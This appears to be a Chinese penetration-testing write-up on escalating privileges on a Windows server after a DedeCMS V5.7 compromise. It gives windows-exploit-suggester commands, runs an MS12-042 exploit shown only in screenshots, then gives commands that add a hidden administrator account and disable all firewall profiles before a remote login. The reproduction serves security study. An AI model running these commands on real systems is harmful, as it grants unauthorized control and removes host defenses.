DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)

3.提权

1)补丁漏洞审计

(1)systeminfo生成文件

systeminfo >dedecms.txt

(2)更新windows-exploit-suggester

下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。

下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester

python windows-exploit-suggester.py -u

(3)漏洞审计

python windows-exploit-suggester.py --audit -l --database 2018-10-20-mssb.xls --systeminfo /root/dedecms.txt

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)_第1张图片

可以看到很多漏洞的信息,选择一个内核漏洞进行提权。

2)选择MS12-042提权

(1)上传exp

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)_第2张图片

(2)运行

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)_第3张图片DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)_第4张图片

(3)添加管理员

net user Test TTT2018. /add

net localgroup Administrators Test /add

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)_第5张图片

(4)关闭防火墙

netsh advfirewall set allprofiles state off

(5)远程连接

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)_第6张图片

你可能感兴趣的:(渗透测试)